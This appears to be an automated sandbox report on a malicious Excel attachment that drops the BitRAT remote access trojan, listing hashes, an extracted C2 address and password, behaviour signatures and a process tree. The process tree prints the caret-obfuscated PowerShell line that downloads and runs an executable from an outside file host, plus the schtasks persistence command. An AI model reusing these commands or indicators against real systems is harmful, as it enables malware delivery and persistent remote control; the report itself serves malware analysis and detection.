Analysis

  • max time kernel
    31s
  • max time network
    74s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-09-2023 15:12

General

  • Target

    Romania_Request_Imun_SRL_09_2023.xls

  • Size

    100KB

  • MD5

    d8c96466da14e352c8a11c86a61200fa

  • SHA1

    738380f30ec9f2448875dd97759bf49aa292cf46

  • SHA256

    896dd0f8a116edbf4f54be7fac310410467043ecbd86b2d4d66089f14bde6d01

  • SHA512

    d81aafbea2392976e331e00ca0cd5c4054f7aab57a640af8a15c6143846c828c0235f34a94721313dec400a8b0724111ed647865846971d33ccca7a57bf5f70c

  • SSDEEP

    3072:0rxEtjPOtioVjDGUU1qfDlaGGx+cL2QnA9tJE2zuxq+fr9wBLa71ba2ryLTHeY+:axEtjPOtioVjDGUU1qfDlavx+W2QnAnF

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Romania_Request_Imun_SRL_09_2023.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4076
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/qyAOUa1rJz/Betro.e^xe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1236
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/qyAOUa1rJz/Betro.exe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3416
        • C:\Users\Public\l6hv4.exe
          "C:\Users\Public\l6hv4.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:4516
          • C:\Users\Public\l6hv4.exe
            "C:\Users\Public\l6hv4.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2720
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c copy "C:\Users\Public\l6hv4.exe" "C:\Users\Admin\AppData\Roaming\uno\uno.exe"
            5⤵
              PID:4636
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3644
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f
                6⤵
                • Creates scheduled task(s)
                PID:4740
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\uno"
              5⤵
                PID:4440
      • C:\Users\Admin\AppData\Roaming\uno\uno.exe
        C:\Users\Admin\AppData\Roaming\uno\uno.exe
        1⤵
        • Executes dropped EXE
        PID:1124

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ynt0ytmq.xii.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\uno\uno.exe
        Filesize

        7.6MB

        MD5

        1c9f3c0258e923c07e1943498c789a3d

        SHA1

        e908faaa5eff19c6b653241253ecc6f28c83f436

        SHA256

        925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55

        SHA512

        92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

      • C:\Users\Admin\AppData\Roaming\uno\uno.exe
        Filesize

        256KB

        MD5

        bfa9c7bea19db4dab09d5e613ca66866

        SHA1

        3e191cc38958a0c774e0a0401b366b9f2a7cb439

        SHA256

        fd1ea75d6e6978d7be0115893592c4583cc8f089107f3747b8e8ddd4e9da131c

        SHA512

        6aaeb69d47c34a640716479ee98ba73c4c537abf1c80295065c3f994ab65fd4d477b03c53e0cd40a7e21f9cf8c262815cf75f5602130c390dc2363b6ad72d61d

      • C:\Users\Admin\AppData\Roaming\uno\uno.exe
        Filesize

        39KB

        MD5

        44b9bd1a68703d5d8d1b115d58fcf8f9

        SHA1

        4560e7c1e80f901780a3a0defcd4928a65007409

        SHA256

        ce593003296e79ff26b4961faa89535d80ca4476a56b1d2bf5cfd4635d9e7cb8

        SHA512

        5587fd30d4b425307ce58a013de1586e0f977e1a79ae7a510c70abd0805a9344f3749cf53089d05614b183225ccfae198d9535ef48165f5c286224433d9f5874

      • C:\Users\Public\l6hv4.exe
        Filesize

        7.6MB

        MD5

        1c9f3c0258e923c07e1943498c789a3d

        SHA1

        e908faaa5eff19c6b653241253ecc6f28c83f436

        SHA256

        925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55

        SHA512

        92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

      • C:\Users\Public\l6hv4.exe
        Filesize

        7.6MB

        MD5

        1c9f3c0258e923c07e1943498c789a3d

        SHA1

        e908faaa5eff19c6b653241253ecc6f28c83f436

        SHA256

        925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55

        SHA512

        92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

      • C:\Users\Public\l6hv4.exe
        Filesize

        7.6MB

        MD5

        1c9f3c0258e923c07e1943498c789a3d

        SHA1

        e908faaa5eff19c6b653241253ecc6f28c83f436

        SHA256

        925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55

        SHA512

        92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

      • memory/2720-84-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2720-74-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2720-80-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2720-79-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2720-78-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2720-76-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2720-75-0x00000000748F0000-0x0000000074929000-memory.dmp
        Filesize

        228KB

      • memory/2720-81-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2720-82-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2720-68-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2720-70-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2720-67-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2720-83-0x0000000074C70000-0x0000000074CA9000-memory.dmp
        Filesize

        228KB

      • memory/2720-85-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2720-65-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2720-86-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3416-49-0x000001B468C90000-0x000001B468CA0000-memory.dmp
        Filesize

        64KB

      • memory/3416-32-0x000001B469340000-0x000001B469362000-memory.dmp
        Filesize

        136KB

      • memory/3416-40-0x000001B468C90000-0x000001B468CA0000-memory.dmp
        Filesize

        64KB

      • memory/3416-37-0x00007FFA15D20000-0x00007FFA167E1000-memory.dmp
        Filesize

        10.8MB

      • memory/3416-38-0x000001B468C90000-0x000001B468CA0000-memory.dmp
        Filesize

        64KB

      • memory/3416-58-0x00007FFA15D20000-0x00007FFA167E1000-memory.dmp
        Filesize

        10.8MB

      • memory/3416-39-0x000001B468C90000-0x000001B468CA0000-memory.dmp
        Filesize

        64KB

      • memory/3416-46-0x00007FFA15D20000-0x00007FFA167E1000-memory.dmp
        Filesize

        10.8MB

      • memory/3416-50-0x000001B468C90000-0x000001B468CA0000-memory.dmp
        Filesize

        64KB

      • memory/4076-22-0x000001F48AA20000-0x000001F48B220000-memory.dmp
        Filesize

        8.0MB

      • memory/4076-8-0x00007FFA3E210000-0x00007FFA3E405000-memory.dmp
        Filesize

        2.0MB

      • memory/4076-44-0x000001F48AA20000-0x000001F48B220000-memory.dmp
        Filesize

        8.0MB

      • memory/4076-43-0x00007FFA3E210000-0x00007FFA3E405000-memory.dmp
        Filesize

        2.0MB

      • memory/4076-1-0x00007FFA3E210000-0x00007FFA3E405000-memory.dmp
        Filesize

        2.0MB

      • memory/4076-2-0x00007FFA3E210000-0x00007FFA3E405000-memory.dmp
        Filesize

        2.0MB

      • memory/4076-4-0x00007FFA3E210000-0x00007FFA3E405000-memory.dmp
        Filesize

        2.0MB

      • memory/4076-0-0x00007FF9FE290000-0x00007FF9FE2A0000-memory.dmp
        Filesize

        64KB

      • memory/4076-3-0x00007FF9FE290000-0x00007FF9FE2A0000-memory.dmp
        Filesize

        64KB

      • memory/4076-42-0x00007FFA3E210000-0x00007FFA3E405000-memory.dmp
        Filesize

        2.0MB

      • memory/4076-5-0x00007FF9FE290000-0x00007FF9FE2A0000-memory.dmp
        Filesize

        64KB

      • memory/4076-45-0x000001F48AA20000-0x000001F48B220000-memory.dmp
        Filesize

        8.0MB

      • memory/4076-6-0x00007FFA3E210000-0x00007FFA3E405000-memory.dmp
        Filesize

        2.0MB

      • memory/4076-16-0x00007FF9FC230000-0x00007FF9FC240000-memory.dmp
        Filesize

        64KB

      • memory/4076-7-0x00007FF9FE290000-0x00007FF9FE2A0000-memory.dmp
        Filesize

        64KB

      • memory/4076-15-0x00007FFA3E210000-0x00007FFA3E405000-memory.dmp
        Filesize

        2.0MB

      • memory/4076-14-0x00007FFA3E210000-0x00007FFA3E405000-memory.dmp
        Filesize

        2.0MB

      • memory/4076-13-0x00007FFA3E210000-0x00007FFA3E405000-memory.dmp
        Filesize

        2.0MB

      • memory/4076-12-0x00007FF9FC230000-0x00007FF9FC240000-memory.dmp
        Filesize

        64KB

      • memory/4076-11-0x00007FFA3E210000-0x00007FFA3E405000-memory.dmp
        Filesize

        2.0MB

      • memory/4076-10-0x00007FFA3E210000-0x00007FFA3E405000-memory.dmp
        Filesize

        2.0MB

      • memory/4076-25-0x000001F48AA20000-0x000001F48B220000-memory.dmp
        Filesize

        8.0MB

      • memory/4076-9-0x00007FF9FE290000-0x00007FF9FE2A0000-memory.dmp
        Filesize

        64KB

      • memory/4076-41-0x00007FFA3E210000-0x00007FFA3E405000-memory.dmp
        Filesize

        2.0MB

      • memory/4516-63-0x00000000055E0000-0x00000000055F0000-memory.dmp
        Filesize

        64KB

      • memory/4516-71-0x00000000749E0000-0x0000000075190000-memory.dmp
        Filesize

        7.7MB

      • memory/4516-64-0x0000000007150000-0x00000000078DA000-memory.dmp
        Filesize

        7.5MB

      • memory/4516-62-0x0000000005BA0000-0x0000000006144000-memory.dmp
        Filesize

        5.6MB

      • memory/4516-61-0x0000000000460000-0x0000000000BFC000-memory.dmp
        Filesize

        7.6MB

      • memory/4516-60-0x00000000749E0000-0x0000000075190000-memory.dmp
        Filesize

        7.7MB